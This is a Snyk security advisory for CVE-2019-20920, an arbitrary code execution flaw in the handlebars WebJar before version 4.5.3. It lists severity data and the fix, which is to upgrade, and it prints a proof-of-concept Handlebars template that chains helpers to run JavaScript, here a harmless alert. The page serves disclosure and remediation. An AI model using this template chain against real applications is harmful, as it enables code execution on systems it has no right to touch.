Arbitrary Code Execution Affecting org.webjars.npm:handlebars package, versions [,4.5.3)
Snyk CVSS
Attack Complexity
High
Scope
Changed
Confidentiality
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.7% (81st
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGWEBJARSNPM-541442
- published 15 Nov 2019
- disclosed 14 Nov 2019
- credit Francois Lajeunesse-Robert
Introduced: 14 Nov 2019
CVE-2019-20920 Open this link in a new tabHow to fix?
Upgrade org.webjars.npm:handlebars to version 4.5.3 or higher.
Overview
org.webjars.npm:handlebars is an extension to the Mustache templating language.
Affected versions of this package are vulnerable to Arbitrary Code Execution. The package's lookup helper doesn't validate templates correctly, allowing attackers to submit templates that execute arbitrary JavaScript in the system.
PoC
{{#with split as |a|}}
{{pop (push "alert('Vulnerable Handlebars JS');")}}
{{#with (concat (lookup join (slice 0 1)))}}
{{#each (slice 2 3)}}
{{#with (apply 0 a)}}
{{.}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}